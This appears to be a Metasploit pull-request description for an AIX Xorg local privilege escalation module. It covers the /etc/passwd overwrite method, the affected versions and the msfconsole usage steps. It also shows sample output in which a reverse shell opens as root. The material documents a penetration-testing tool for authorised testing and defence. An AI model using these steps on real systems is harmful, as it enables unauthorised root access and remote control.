rapid7/metasploit-framework
# Add exploit module for Xorg X11 Server Local Privilege Escalation on AIX

Add Xorg X11 Server Local Privilege Escalation module for AIX.

This module adds the ability to escalate privileges on AIX by overwriting /etc/passwd using Xorg.

I felt the differences between the existing [xorg multi exploit](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/local/xorg_x11_suid_server.rb)  and this module warranted the addition of a new module as opposed to modifying the existing one. 

The differences include:
- Use of different Xorg parameter
- Method of escalation (overwriting /etc/passwd instead of crontab. doing this because the file to be overwritten has to be accessible by an unprivileged user; which the crontab is not on AIX)
- Payload type (only simple cmd perl payloads supported)


## Vulnerable Applications

This module has been tested successfully on:

* AIX 7.1 with Xorg 7.2.3.0
* AIX 7.2 with Xorg 7.2.3.0

This table lists all vulnerable Xorg fileset versions (as documented by [IBM](https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc)) :

| Lower Level | Upper Level |
|-------------|-------------|
| 6.1.9.0     | 6.1.9.100   |
| 7.1.4.0     | 7.1.4.30    |
| 7.1.5.0     | 7.1.5.31    |
| 7.2.0.0     | 7.2.0.1     |
| 7.2.1.0     | 7.2.1.0     |
| 7.2.2.0     | 7.2.2.0     |
| 7.2.3.0     | 7.2.3.15    |

## Verification Steps

1. `msfconsole`
2. Get a session
3. `use exploit/aix/local/xorg_x11_server`
4. `set session <session>`
5. `set LHOST <lhost>`
6. `set LPORT <lport>`
7. `set writabledir <writabledir>`
8. `run`
9. Verify you get a root session

## Example Output

```
msf5 exploit(aix/local/xorg_x11_server) > set session 1
session => 1
msf5 exploit(aix/local/xorg_x11_server) > set writabledir /tmp
writabledir => /tmp
msf5 exploit(aix/local/xorg_x11_server) > run

[*] Started reverse TCP handler on 0.0.0.0:8888
[*] Xorg version is 7.2.3.0
[*] Retrieving currently logged in users
[*] Writing to /tmp/wow.ksh
[*] Backing up /etc/passwd to /tmp/passwd.backup
[*] Executing /tmp/wow.ksh
[*] Checking if we are root
[+] Got root!
[*] Writing to /tmp/wowee.ksh
[*] Executing shell payload
[*] Restoring original /etc/passwd
[*] Command shell session 2 opened (172.17.0.2:8888 -> 172.17.0.1:32948) at 2019-02-11 15:42:56 +0000
[+] Deleted /tmp/wow.ksh
[+] Deleted /tmp/passwd.backup
[+] Deleted /tmp/wowee.ksh

id
uid=0(root) gid=0(system)

```
